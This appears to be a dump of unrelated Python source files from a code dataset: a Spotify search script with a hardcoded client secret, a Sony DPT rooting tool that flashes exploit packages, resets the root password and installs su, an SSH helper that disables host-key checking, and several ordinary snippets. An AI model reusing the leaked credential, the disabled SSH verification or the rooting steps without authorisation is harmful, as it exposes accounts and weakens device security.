formatter = logging.Formatter(format)
handler.setFormatter(formatter)
log.addHandler(handler)
cls.log = log
return cls.log
| StarcoderdataPython |
1740116 | <gh_stars>0
from guet.git.hook_present import hook_present
def any_hooks_present(git_path: str):
pre_commit_present = hook_present(git_path, 'pre-commit')
post_commit_present = hook_present(git_path, 'post-commit')
commit_msg_present = hook_present(git_path, 'commit-msg')
return pre_commit_present or post_commit_present or commit_msg_present
| StarcoderdataPython |
6638282 | <reponame>shaswat01/MoodZen<filename>src/search_song.py
from spotify_api import *
client_id = "718bb5e6caca403c942c2a292492ae64"
client_secret = "4980e48cec984e9aad21b60205c3f01b"
spotify = SpotifyAPI(client_id, client_secret)
def search_new_song(song_name, artist_name = '', DIR = 'src/data/'):
search_result = spotify.base_search(song_name + ' ' + artist_name, search_type="track")
if search_result['tracks']['total'] == 0:
search_result = spotify.base_search(song_name, search_type="track")
prev_url = search_result['tracks']['items'][0]['preview_url']
if prev_url is None:
return "Song Cannot Be Downloaded Using Spotify API"
else:
song_id = search_result['tracks']['items'][0]['id']
track_name = search_result['tracks']['items'][0]['name']
track_artist = search_result['tracks']['items'][0]['album']['artists'][0]['name']
features = spotify.get_features(song_id)
valence = features['valence']
energy = features['energy']
song_url = search_result['tracks']['items'][0]['external_urls']['spotify']
wget.download(prev_url, DIR + song_id + '.wav')
return song_id, track_name, track_artist, song_url, valence, energy | StarcoderdataPython |
11268612 | <filename>python_api/libInteractive.py
#!/usr/bin/python3
# built-ins
import os
import time
import subprocess
# import traceback
'''
Web Interface API Related
'''
def update_firmware(dpt):
'''
update firmware interface
'''
dpt.info_print(
'Please make sure you have charged your battery before this action.')
try:
resp = input('>>> Please enter the pkg file path: ')
if not os.path.isfile(resp):
dpt.err_print('File `{}` does not exist!'.format(resp))
return False
resp2 = input('>>> Pleae confirm {} is the pkg file to use [yes/no]: ')
if resp2 == 'yes':
if not dpt.update_firmware(open(resp, 'rb')):
dpt.err_print('Failed to upload pkg {}'.format(resp))
return False
dpt.info_print('Success!')
return True
elif resp == 'no':
dpt.info_print('Okay!')
else:
dpt.err_print('Unrecognized response: {}'.format(resp))
except BaseException as e:
dpt.err_print(str(e))
return False
def validate_required_files(dpt, purpose='diagnosis'):
if purpose == 'su-binary':
requiredFiles = [
'python_api/assets/su',
'python_api/assets/supolicy',
'python_api/assets/libsupol.so',
'python_api/assets/install-recovery.sh'
]
else:
requiredFiles = [
'python_api/assets/shankerzhiwu_disableidcheck.pkg',
'python_api/assets/shankerzhiwu_changepwd.pkg'
]
dpt.dbg_print('Checking required files...')
for file in requiredFiles:
if not os.path.isfile(file):
dpt.err_print('File {0} does not exist!'.format(file))
return False
return True
def disable_id_check(dpt):
'''
disable the id check (thanks to shankerzhiwu and his/her friend)
'''
fp = 'python_api/assets/shankerzhiwu_disableidcheck.pkg'
try:
resp = input('>>> Have you disabled the id check already? [yes/no]: ')
if resp == 'no':
if not dpt.update_firmware(open(fp, 'rb')):
dpt.err_print('Failed to upload shankerzhiwu_disableidcheck pkg')
return False
try:
input(
'>>> Press `Enter` key to continue after your DPT reboot, ' +
'shows `update failure` message, and connects back to WiFi: ')
except BaseException as e:
dpt.err_print(str(e))
return False
return True
elif resp == 'yes':
return True
else:
dpt.err_print('Unrecognized response: {}'.format(resp))
except BaseException as e:
dpt.err_print(str(e))
return False
def reset_root_password(dpt):
'''
reset the root password (thanks to shankerzhiwu and his/her friend)
'''
fp = 'python_api/assets/shankerzhiwu_changepwd.pkg'
try:
if not dpt.update_firmware(open(fp, 'rb')):
dpt.err_print('Failed to upload shankerzhiwu_changepwd pkg')
return False
return True
except BaseException as e:
dpt.err_print(str(e))
return False
def obtain_diagnosis_access(dpt):
'''
root thanks to shankerzhiwu
'''
dpt.info_print(
'Please make sure you have charged your battery before this action.')
dpt.info_print(
'Thank shankerzhiwu (and his/her anonymous friend) a lot on this hack!!!' +
'All credits go to him (and his/her anonymous friend)!')
if not validate_required_files(dpt):
return False
# step 1: disable the id check
if not disable_id_check(dpt):
return False
dpt.info_print('Congrats! You are half-way through! You have disabled the OTG ID check')
# step 2: reset root password
if not reset_root_password(dpt):
return False
dpt.info_print(
'You are all set! Wait till your DPT reboots and ' +
'shows `update failure` message! More edits will be added to this tool.')
return True
'''
Diagnosis Related
'''
def print_diagnosis_info():
print("""============================
DPT Tools - Diagnosis Mode
============================
This is diagnosis mode. Type `help` to show this message.
It behaves similarly to regular serial session with less flexibility (cannot use tab, scroll up, quick reverse search, etc.).
This mode intends to automate some complicated procedures.
Supported commands:
`push-file` -- transfer file to DPT at 512bps
`pull-file` -- transfer file from DPT
`backup-bootimg` -- backup the boot img and download it to local device
`restore-bootimg` -- restore the boot img
`get-su-bin` -- enable `su` (root) in adb (beta, not well tested)
`exit`/`quit` -- leave the tool
and many unix cmds (do not support less/head)
""")
def diagnosis_pull_file(
dpt, remotefp=None, folder=None, overwrite=None
):
'''
pull file from device to local via xxd and parsing in
python
do NOT pull large file using this, it will take forever
to finish..
'''
try:
# get and validate remote file path
if remotefp is None:
remotefp = input('> DPT file path: ')
if not dpt.diagnosis_isfile(remotefp):
dpt.err_print('File {} does not exist!'.format(remotefp))
return None
# get local folder path
if folder is None:
folder = input('> Local folder path: ')
if not os.path.isdir(folder):
resp = input(
'> {} not exist, create? [yes/no]: '.format(folder))
if resp == 'no':
return None
elif resp == 'yes':
os.makedirs(folder)
else:
dpt.err_print('Unrecognized input {}'.format(resp))
return None
# check if local fp exists
localfp = "{0}/{1}".format(folder, os.path.basename(remotefp))
if overwrite is None:
overwrite = True
if os.path.isfile(localfp):
resp = input(
'> {} exist, overwrite? [yes/no]: '.format(localfp))
overwrite = True if resp == 'yes' else False
# get md5
md5 = dpt.diagnosis_md5sum_file(remotefp)
# start
dpt.info_print("Pulling file {}, plz be patient...".format(localfp))
if overwrite:
# read from hexdump, parse, and write to local file
startTime = int(time.time() * 1000)
offset = 0
count = 2
with open("{}.tmp".format(localfp), 'w') as f:
while 1:
# split file
cmd = (
"dd if={0} skip={1} ".format(remotefp, offset) +
"count={0} of=/tmp/sparse.tmp".format(count)
)
if not dpt.diagnosis_write(cmd):
break
# cat to download
cmd = (
"cat /tmp/sparse.tmp | " +
"hexdump -ve '32/1 \"%02X\" \"\\n\"'"
)
resp = dpt.diagnosis_write(cmd, timeout=99).splitlines()
if len(resp[1:-1]) > 0:
for each in resp[1:-1]:
f.write(each)
else:
break
offset += count
if offset % 100 == 0:
dpt.info_print("Copying.. at block {}".format(offset))
# use xxd to convert back to binary file
subprocess.call('xxd -r -p {0}.tmp > {0}'.format(localfp), shell=True)
duration = int(time.time() * 1000) - startTime
dpt.info_print('Finished in {0:.2f}sec'.format(duration / 1000.0))
if os.path.isfile(localfp):
dpt.info_print("File pulled to: {}".format(localfp))
dpt.info_print("Please verify if it's MD5 is {}".format(md5))
os.remove("{}.tmp".format(localfp))
return localfp
except BaseException as e:
dpt.err_print(str(e))
dpt.err_print("Failed to pull file {}".format(remotefp))
return None
def diagnosis_push_file(
dpt, chunkSize=128, localfp=None, folder=None, overwrite=None
):
'''
push file from local to device through echo in diagnosis
(serial) mode
using echo is dumb and slow but very reliable
limited to 128 bytes per cmd or below, since we send raw bytes
in string (each byte sent = 4 bytes), and terminal at best
allows 1024 bytes to send
do NOT push large file using this, it will take
forever to finish..
as a reference: push a 16MB file costs you roughly 22min
'''
try:
# get local file path
if localfp is None:
localfp = input('> Local file path: ')
while localfp[-1] == ' ': # remove extra spaces
localfp = localfp[:-1]
if not os.path.isfile(localfp):
dpt.err_print('File {} does not exist!'.format(localfp))
return None
# get remote folder and validate it
if folder is None:
folder = input('> DPT folder path: ')
# folder does not exit, create one?
if not dpt.diagnosis_isfolder(folder):
resp = input('> {} not exist, create? [yes/no]: '.format(folder))
if resp == 'no':
return None
elif resp == 'yes':
dpt.diagnosis_write('mkdir -p {}'.format(folder))
else:
dpt.err_print('Unrecognized input {}'.format(resp))
return None
# remote file exists, overwrite it?
remotefp = "{0}/{1}".format(folder, os.path.basename(localfp))
if overwrite is None:
overwrite = True
if dpt.diagnosis_isfile(remotefp):
resp = input(
'> {} exist, overwrite? [yes/no]: '.format(remotefp))
overwrite = True if resp == 'yes' else False
if overwrite:
# write through echo
firstRun = True
symbol = '>'
startTime = int(time.time() * 1000)
totalChunks = 0
with open(localfp, 'rb') as f:
while 1:
chunk = f.read(chunkSize)
if chunk:
cmd = "echo -e -n '\\x{0}' {1} {2}".format(
'\\x'.join('{:02x}'.format(x) for x in chunk),
symbol,
remotefp
)
if dpt.diagnosis_write(cmd) == "":
raise BaseException
else:
break
if firstRun:
symbol = '>>'
firstRun = False
totalChunks += 1
if totalChunks % 100 == 0:
dpt.info_print(
"Copying.. at chuck {}".format(totalChunks))
duration = int(time.time() * 1000) - startTime
dpt.info_print('Finished in {0:.2f}sec'.format(duration / 1000.0))
if dpt.diagnosis_isfile(remotefp):
md5 = dpt.diagnosis_md5sum_file(remotefp)
dpt.info_print("File pushed to: {}".format(remotefp))
dpt.info_print("It's MD5 is: {}".format(md5))
return remotefp
except BaseException as e:
dpt.err_print(str(e))
return None
def diagnosis_backup_bootimg(dpt):
'''
backup boot img and then pull img from DPT to local disk
'''
remotefp = dpt.diagnosis_backup_boot()
# pull this backup file to current folder
if remotefp:
fp = diagnosis_pull_file(
dpt, remotefp=remotefp, folder=".", overwrite=True
)
if fp is not None:
dpt.info_print("Success!")
return True
dpt.info_print("Nothing happened..")
return False
def diagnosis_get_su_bin(dpt):
'''
get sudo access in adb mode (so it would be much much eaiser to
make changes (no painful serial data transfer)
after doing this, adb should handle most necessary modifications
here we use system-method (push binary files to system)
'''
if not validate_required_files(dpt, purpose='su-binary'):
return False
dpt.info_print("Mounting /system partition..")
mountpoint = dpt.diagnosis_mount_system()
dpt.info_print("Mounted to {}".format(mountpoint))
if not mountpoint:
dpt.err_print("Nothing happened..")
return False
dpt.info_print("Uploading su file to /system/xbin..")
sufp = diagnosis_push_file(
dpt,
localfp='python_api/assets/su',
folder='{}/xbin'.format(mountpoint),
overwrite=True)
if sufp is None:
dpt.err_print("Due to previous failure, we stopped..")
return False
dpt.diagnosis_set_perm(sufp, owner='0.0', perm='0755')
daemonsufp = sufp[:-2] + 'daemonsu'
dpt.diagnosis_write('cp {0} {1}'.format(sufp, daemonsufp))
extfolder = "{}/bin/.ext".format(mountpoint)
dpt.diagnosis_mkdir(extfolder)
dpt.diagnosis_set_perm(extfolder, owner='0.0', perm='0777')
dpt.diagnosis_write('cp {0} {1}/su'.format(sufp, extfolder))
dpt.info_print("Uploading supolicy file to /system/xbin..")
supolicyfp = diagnosis_push_file(
dpt,
localfp='python_api/assets/supolicy',
folder='{}/xbin'.format(mountpoint),
overwrite=True)
if supolicyfp is None:
dpt.err_print("Due to previous failure, we stopped..")
return False
dpt.diagnosis_set_perm(supolicyfp, owner='0.0', perm='0755')
libsupolsofp = diagnosis_push_file(
dpt,
localfp='python_api/assets/libsupol.so',
folder='{}/lib'.format(mountpoint),
overwrite=True)
if libsupolsofp is None:
dpt.err_print("Due to previous failure, we stopped..")
return False
dpt.diagnosis_set_perm(libsupolsofp, owner='0.0', perm='0644')
dpt.info_print("Uploading install-recovery.sh to /system/bin..")
installrecfp = diagnosis_push_file(
dpt,
localfp='python_api/assets/install-recovery.sh',
folder='{}/bin'.format(mountpoint),
overwrite=True)
if installrecfp is None:
dpt.err_print("Due to previous failure, we stopped..")
return False
dpt.diagnosis_set_perm(installrecfp, owner='0.0', perm='0755')
dpt.info_print("Tweaking /system/bin/app_process..")
appprocessfp = '{0}/bin/app_process'.format(mountpoint)
dpt.diagnosis_write('mv {0} {0}_bak'.format(appprocessfp))
dpt.diagnosis_ln(daemonsufp, "/system/bin/app_process")
dpt.info_print("Tweaking /system/bin/app_process32..")
appprocess32fp = '{0}32'.format(appprocessfp)
if dpt.diagnosis_isfile("{}_original".format(appprocess32fp)):
dpt.diagnosis_remove_file(appprocess32fp)
else:
dpt.diagnosis_write("mv {0} {0}_original".format(appprocessfp))
dpt.diagnosis_ln(daemonsufp, "/system/bin/app_process32")
dpt.info_print("Tweaking /system/bin/app_process_init..")
if not dpt.diagnosis_isfile("{}_init".format(appprocessfp)):
dpt.diagnosis_write(
"cp {0}_ori {1}_init".format(appprocess32fp, appprocessfp))
dpt.diagnosis_set_perm(
"{}_init".format(appprocessfp), owner='0.2000', perm='0755')
dpt.info_print("Misc: add /system/etc/.installed_su_daemon")
miscfp = "{}/etc/.installed_su_daemon".format(mountpoint)
dpt.diagnosis_write("echo 1 > {}".format(miscfp))
dpt.diagnosis_set_perm(miscfp, owner='0.0', perm='0644')
dpt.info_print("Done!")
def diagnosis_restore_bootimg(dpt, usetmpfp=None, bootimgfp=None):
'''
restore boot img
'''
if usetmpfp is None:
resp = input('> Upload boot img? [yes/no]: ')
usetmpfp = False if resp == 'yes' else True
# directly use the original backup, if exists
if usetmpfp:
dpt.info_print("Trying to use /root/boot.img.bak")
return dpt.diagnosis_restore_boot(fp="/root/boot.img.bak")
# otherwise we need to first upload our own boot img
remotefp = diagnosis_push_file(dpt, folder="/tmp", overwrite=True)
if remotefp is not None:
resp = input('> Confirm to continue? [yes/no]: ')
if resp == 'yes':
if dpt.diagnosis_restore_boot(fp=remotefp):
dpt.info_print("Success!")
return True
dpt.err_print("Failed..")
return False
dpt.err_print("Nothing happened..")
return False
def diagnosis_cmd(dpt):
'''
run commands in diagnosis mode
'''
# login
if not dpt.diagnosis_login(username='root', password='<PASSWORD>'):
dpt.err_print('failed to login..')
return
# interactive mode
firstTime = True
frontLine = 'root #: '
while 1:
if firstTime:
print_diagnosis_info()
firstTime = False
try:
cmd = input(frontLine)
if cmd == 'exit' or cmd == 'quit':
break
elif cmd == 'help':
print_diagnosis_info()
continue
elif cmd == 'push-file':
diagnosis_push_file(dpt)
continue
elif cmd == 'pull-file':
diagnosis_pull_file(dpt)
continue
elif cmd == 'backup-bootimg':
diagnosis_backup_bootimg(dpt)
continue
elif cmd == 'restore-bootimg':
diagnosis_restore_bootimg(dpt)
continue
elif cmd == 'get-su-bin':
diagnosis_get_su_bin(dpt)
continue
rawresp = dpt.diagnosis_write(cmd)
# ignore first and last echos
tmp = rawresp.splitlines()
frontLine = tmp[-1]
resp = tmp[1:-1]
for line in resp:
print(line)
except KeyboardInterrupt:
break
except EOFError:
break
except BaseException as e:
dpt.err_print(str(e))
def diagnosis_mode(dpt):
'''
enter diagnosis mode
'''
dpt.info_print('Steps to enter diagnosis mode:')
dpt.info_print('1. Turn of DPT')
dpt.info_print('2. Hold HOME button')
dpt.info_print('3. Press POWER button once. Then light blinks yellow')
dpt.info_print('4. Release HOME button, a black square will show up')
dpt.info_print('5. Connect to computer')
try:
resp = input('>>> Black square on the screen? [yes/no]: ')
if resp == 'no':
return False
elif not resp == 'yes':
dpt.err_print('Unrecognized response: {}'.format(resp))
return False
ttyName = input('>>> Enter the serial port [/dev/tty.usbmodem01]: ')
if ttyName == "":
ttyName = "/dev/tty.usbmodem01"
if not os.path.exists(ttyName):
dpt.err_print('serial `{}` not exists!'.format(ttyName))
return False
except BaseException as e:
dpt.err_print(str(e))
return False
if not dpt.connect_to_diagnosis(ttyName):
return False
diagnosis_cmd(dpt)
dpt.shut_down_diagnosis()
return True
| StarcoderdataPython |
6417975 | <reponame>aarora08/nasa-apod-scraper
import asyncio
import re
from dataclasses import InitVar, dataclass, field
from datetime import date, datetime
from pathlib import Path
from typing import Dict
import aiofiles
from aiohttp import ClientSession, client_exceptions, web
from bs4 import BeautifulSoup
from faker import Faker
@dataclass
class Common:
relative_url: InitVar[str]
name: str = field(init=False)
publish_date: date = field(init=False)
built_url: str = field(init=False)
@staticmethod
def parse_date_name(raw_str: str) -> Dict:
pattern = re.compile(
r"(?P<date>[\d]{4}\s[\S]*[\s][\d]{1,2})[\s]?-[\s]*(?P<name>[\s\S]*)[\s]?(?P<extra>\n)"
)
match = pattern.search(raw_str)
return match.groupdict()
@staticmethod
def get_agent():
fake = Faker()
Faker.seed(0)
return fake.chrome()
@dataclass
class Parser(Common):
name: str = field(init=False)
image_url: str = field(init=False)
html: BeautifulSoup = field(init=False)
base_url: str = "https://apod.nasa.gov/apod"
def __post_init__(self, relative_url):
self.built_url = f"{self.base_url}/{relative_url}"
async def fetch(self) -> None:
headers = {"User-Agent": self.get_agent()}
async with ClientSession(headers=headers) as session:
async with session.get(self.built_url) as response:
response.raise_for_status()
data = await response.read()
try:
self.html = BeautifulSoup(data, "html5lib")
except UnicodeDecodeError:
print("html decoding error")
raise UnicodeDecodeError
def pull_image(self):
image = self.html.findAll("img")
if not image:
raise AttributeError
image = image[0]
self.image_url = image.get("src") or None
matched_result: Dict = self.parse_date_name(self.html.title.string)
self.name = matched_result["name"]
self.publish_date = datetime.strptime(
matched_result.get("date"), "%Y %B %d"
).date()
def asdict(self) -> Dict:
return dict(
name=self.name, publish_date=self.publish_date, relative_url=self.image_url
)
async def run(self):
try:
await self.fetch()
self.pull_image()
return True
except web.HTTPClientError:
print("url not found")
return False
except client_exceptions.ClientConnectorError:
print("connection denied")
return False
except AttributeError:
print("image not found")
raise AttributeError
except UnicodeDecodeError:
print("why you no work?")
return False
except client_exceptions.ClientOSError:
print("connection denied")
return False
except asyncio.TimeoutError:
print("connection timeout")
return False
@dataclass
class Image(Common):
name: str
data_dir: InitVar[str]
file_name: str = field(init=False)
publish_date: date
storage_location: Path = field(init=False)
base_url: str = "https://apod.nasa.gov/apod"
def __post_init__(self, relative_url: str, data_dir: str):
self.built_url = f"{self.base_url}/{relative_url}"
self.storage_location = Path(
f'{data_dir}/{self.publish_date.year}/{self.publish_date.strftime("%B")}'
)
self.storage_location.mkdir(parents=True, exist_ok=True)
file_ext = relative_url.split(".")[-1]
self.file_name = f'{self.name.replace(" ", "_").replace("/","_")}.{file_ext}'
async def save(self):
headers = {"User-Agent": self.get_agent()}
async with ClientSession(headers=headers) as session:
async with session.get(self.built_url) as response:
response.raise_for_status()
data = await response.read()
async with aiofiles.open(
self.storage_location / self.file_name, mode="wb"
) as f:
await f.write(data)
print(f"saved file for {self.storage_location / self.file_name}")
async def run(self):
try:
await self.save()
return True
except web.HTTPClientError:
print("url not found")
return False
except client_exceptions.ClientConnectorError:
print("connection denied")
return False
except client_exceptions.ClientResponseError:
print("file not found")
raise AttributeError
except client_exceptions.ClientOSError:
print("connection denied")
return False
except asyncio.TimeoutError:
print("connection timeout")
return False
| StarcoderdataPython |
96855 | <reponame>Kamaradeivanov/pulumi-scaleway
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from . import utilities, tables
class InstanceSecurityGroup(pulumi.CustomResource):
description: pulumi.Output[str]
"""
The description of the security group
"""
external_rules: pulumi.Output[bool]
inbound_default_policy: pulumi.Output[str]
"""
Default inbound traffic policy for this security group
"""
inbound_rules: pulumi.Output[list]
"""
Inbound rules for this security group
* `action` (`str`)
* `ip` (`str`)
* `ip_range` (`str`)
* `port` (`float`)
* `portRange` (`str`)
* `protocol` (`str`)
"""
name: pulumi.Output[str]
"""
The name of the security group
"""
organization_id: pulumi.Output[str]
"""
The organization_id you want to attach the resource to
"""
outbound_default_policy: pulumi.Output[str]
"""
Default outbound traffic policy for this security group
"""
outbound_rules: pulumi.Output[list]
"""
Outbound rules for this security group
* `action` (`str`)
* `ip` (`str`)
* `ip_range` (`str`)
* `port` (`float`)
* `portRange` (`str`)
* `protocol` (`str`)
"""
stateful: pulumi.Output[bool]
"""
The stateful value of the security group
"""
zone: pulumi.Output[str]
"""
The zone you want to attach the resource to
"""
def __init__(__self__, resource_name, opts=None, description=None, external_rules=None, inbound_default_policy=None, inbound_rules=None, name=None, organization_id=None, outbound_default_policy=None, outbound_rules=None, stateful=None, zone=None, __props__=None, __name__=None, __opts__=None):
"""
Create a InstanceSecurityGroup resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of the security group
:param pulumi.Input[str] inbound_default_policy: Default inbound traffic policy for this security group
:param pulumi.Input[list] inbound_rules: Inbound rules for this security group
:param pulumi.Input[str] name: The name of the security group
:param pulumi.Input[str] organization_id: The organization_id you want to attach the resource to
:param pulumi.Input[str] outbound_default_policy: Default outbound traffic policy for this security group
:param pulumi.Input[list] outbound_rules: Outbound rules for this security group
:param pulumi.Input[bool] stateful: The stateful value of the security group
:param pulumi.Input[str] zone: The zone you want to attach the resource to
The **inbound_rules** object supports the following:
* `action` (`pulumi.Input[str]`)
* `ip` (`pulumi.Input[str]`)
* `ip_range` (`pulumi.Input[str]`)
* `port` (`pulumi.Input[float]`)
* `portRange` (`pulumi.Input[str]`)
* `protocol` (`pulumi.Input[str]`)
The **outbound_rules** object supports the following:
* `action` (`pulumi.Input[str]`)
* `ip` (`pulumi.Input[str]`)
* `ip_range` (`pulumi.Input[str]`)
* `port` (`pulumi.Input[float]`)
* `portRange` (`pulumi.Input[str]`)
* `protocol` (`pulumi.Input[str]`)
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['description'] = description
__props__['external_rules'] = external_rules
__props__['inbound_default_policy'] = inbound_default_policy
__props__['inbound_rules'] = inbound_rules
__props__['name'] = name
__props__['organization_id'] = organization_id
__props__['outbound_default_policy'] = outbound_default_policy
__props__['outbound_rules'] = outbound_rules
__props__['stateful'] = stateful
__props__['zone'] = zone
super(InstanceSecurityGroup, __self__).__init__(
'scaleway:index/instanceSecurityGroup:InstanceSecurityGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, description=None, external_rules=None, inbound_default_policy=None, inbound_rules=None, name=None, organization_id=None, outbound_default_policy=None, outbound_rules=None, stateful=None, zone=None):
"""
Get an existing InstanceSecurityGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of the security group
:param pulumi.Input[str] inbound_default_policy: Default inbound traffic policy for this security group
:param pulumi.Input[list] inbound_rules: Inbound rules for this security group
:param pulumi.Input[str] name: The name of the security group
:param pulumi.Input[str] organization_id: The organization_id you want to attach the resource to
:param pulumi.Input[str] outbound_default_policy: Default outbound traffic policy for this security group
:param pulumi.Input[list] outbound_rules: Outbound rules for this security group
:param pulumi.Input[bool] stateful: The stateful value of the security group
:param pulumi.Input[str] zone: The zone you want to attach the resource to
The **inbound_rules** object supports the following:
* `action` (`pulumi.Input[str]`)
* `ip` (`pulumi.Input[str]`)
* `ip_range` (`pulumi.Input[str]`)
* `port` (`pulumi.Input[float]`)
* `portRange` (`pulumi.Input[str]`)
* `protocol` (`pulumi.Input[str]`)
The **outbound_rules** object supports the following:
* `action` (`pulumi.Input[str]`)
* `ip` (`pulumi.Input[str]`)
* `ip_range` (`pulumi.Input[str]`)
* `port` (`pulumi.Input[float]`)
* `portRange` (`pulumi.Input[str]`)
* `protocol` (`pulumi.Input[str]`)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["description"] = description
__props__["external_rules"] = external_rules
__props__["inbound_default_policy"] = inbound_default_policy
__props__["inbound_rules"] = inbound_rules
__props__["name"] = name
__props__["organization_id"] = organization_id
__props__["outbound_default_policy"] = outbound_default_policy
__props__["outbound_rules"] = outbound_rules
__props__["stateful"] = stateful
__props__["zone"] = zone
return InstanceSecurityGroup(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| StarcoderdataPython |
3421152 | class Solution(object):
def halvesAreAlike(self, s):
"""
:type s: str
:rtype: bool
"""
self.vowels = set(['a', 'e', 'i', 'o', 'u',
'A', 'E', 'I', 'O', 'U'])
halve = len(s) // 2
return self.count_vowel(s[:halve]) == self.count_vowel(s[halve:])
def count_vowel(self, s):
a = 0
for c in s:
if c in self.vowels:
a += 1
return a
def test_halves_are_alike():
s = Solution()
assert s.halvesAreAlike("book")
assert s.halvesAreAlike("textbook") is False
assert s.halvesAreAlike("MerryChristmas") is False
assert s.halvesAreAlike("AbCdEfGh")
| StarcoderdataPython |
1905854 | from abc import abstractmethod
class EntityBase:
@abstractmethod
def __str__(self, prefix=""):
"""Return a textual representation of this entity
:param prefix: must be output at the start of each line out output
:return: a string
example:
def __str__(self, prefix=""):
return colored(f"MyEntity {self.id}", 'red') + \
f"{prefix} attr1: {self.attr1}\n" + \
f"{prefix} attr2: {self.attr2}\n"
"""
@abstractmethod
def print(self, prefix="", verbose=False, associated_entities_to_show=None):
"""Display textual representation of this entity and optionally, associated ones.
:param prefix: must be output at the start of each line out output
:param verbose: display verbose output, pass this on to other entities
:param associated_entities_to_show: an array of strings, each of which is an entity name, e.g. "file"
that should also be displayed
:return: nothing
"""
| StarcoderdataPython |
197639 | <filename>ch07/list_stack.py
"""
Stack Data Type implemented using linked lists.
"""
from algs.node import Node
class Stack:
"""
Implementation of a Stack using linked lists.
"""
def __init__(self):
self.top = None
def is_empty(self):
"""Determine if queue is empty."""
return self.top is None
def push(self, val):
"""Push new item to the top of the stack."""
self.top = Node(val, self.top)
def pop(self):
"""Remove and return top item from stack."""
if self.is_empty():
raise RuntimeError('Stack is empty')
val = self.top.value
self.top = self.top.next
return val
| StarcoderdataPython |
5188441 | <reponame>zmcneilly/animated-journey
import argparse
import re
import os
import ssh_config
import paramiko
import getpass
from pathlib import Path
from ssh_config.hosts import ping
def prompt_for_input(prompt: str="Continue? [y/n]"):
resp = input(prompt).lower().strip()
if resp[0] == "y":
return True
elif resp[0] == "n":
return False
else:
print("Invalid input")
return prompt_for_input(prompt)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--port", type=int, help="Port to connect to", default=22)
parser.add_argument("--binary", type=str, default="/usr/bin/ssh", help="SSH binary to use")
parser.add_argument("--key", type=str, default="", help="SSH Key to install on remote host")
parser.add_argument("--output", help="Bash script to write to")
parser.add_argument('connection_string', type=str, help="SSH Connection string")
return parser.parse_args()
def open_ssh_key(path: str, password: str=None) -> (paramiko.pkey.PKey, str):
"""
Function will return the Pkey object for the path specified
:param path: The path to the Pkey object
:param password: (Optional) The password for the private key
:return: Loaded Pkey
"""
with open(path, "r") as __f:
for key_type in [paramiko.DSSKey, paramiko.RSAKey, paramiko.ECDSAKey]:
try:
key_type.from_private_key(__f)
except paramiko.PasswordRequiredException:
if password is None:
password = getpass.getpass("SSH Key password: ")
try:
return key_type.from_private_key(__f, password), password
except paramiko.SSHException:
pass
def main():
# Handle arguments
args = parse_args()
match = re.search(r'^(?:([^@]+)@)?(.*)$', args.connection_string)
hostname = match.group(2)
username = match.group(1)
ssh_args = "-o GlobalKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"
# Do inital setup of host and user
if username is None or username == "":
username = os.environ["USER"]
if not ping(hostname):
if not prompt_for_input("{} not responding; continue? [y/n]".format(hostname)):
raise ConnectionError("Cannot reach {}".format(hostname))
host_config = ssh_config.load_host_configuration_file(hostname)
user_config = ssh_config.SshUser(username)
if host_config is None:
pub_key = ssh_config.get_host_key(hostname, args.port)
host_config = ssh_config.SshConfig(hostname, args.port, public_host_key=pub_key, users={user_config})
for user in host_config.users:
if user.name == username:
user_config = user
# Validate the SSH host key
if not host_config.validate_public_host_key():
if prompt_for_input("Public key doesn't match records; continue? [y/n]"):
host_config.public_host_key = ssh_config.get_host_key(host_config.working_alias, host_config.port)
else:
raise ConnectionError("Public host key is wrong! Aborting")
# Check if key was specified at the command line
if args.key != "":
user_config.key_location = str(Path(args.key).resolve())
user_config.desire_key = True
while not host_config.validate_login(user_config):
user_config.passwd = getpass.getpass("Can't authenticate. {con_str}'s password: ".format(con_str=args.connection_string))
host_config.users.update({user_config})
# Paramiko, at least, has access.
# Handle key installation
if user_config.desire_key and Path(user_config.key_location).exists():
priv_key, priv_key_password = open_ssh_key(user_config.key_location, user_config.key_password)
pub_key = priv_key.get_base64()
if priv_key_password is not None:
user_config.key_password = priv_key_password
ssh = host_config.get_ssh_connection(user_config)
sftp = ssh.open_sftp()
# Create bash script
with open(str(Path(args.output).resolve()), "w") as __f:
connection = "{ssh} {arguments} {user}@{host}\n\n".format(ssh=args.binary,
arguments=ssh_args,
user=user_config.name,
host=host_config.working_alias)
__f.write("#!/bin/bash\n\n")
__f.write(connection)
# Save any changes
host_config.users.update({user_config})
ssh_config.add_to_configuration(host_config)
if __name__ == "__main__":
main() | StarcoderdataPython |
4811560 | from __future__ import annotations
from ._version import version as __version__
__all__ = ["__version__"]
| StarcoderdataPython |
3369495 | from requests.exceptions import HTTPError
from unittest.mock import Mock
requests = Mock()
def get_users():
r = requests.get('http://demo/api/users')
if r.status_code == 200:
return r.json()
return None
if __name__ == '__main__':
requests.get.side_effect = HTTPError
try:
get_users()
except HTTPError:
print('HTTPError')
# Assert that the mock was called exactly once.
requests.get.assert_called_once()
# try:
# get_users()
# except HTTPError:
# print('HTTPError')
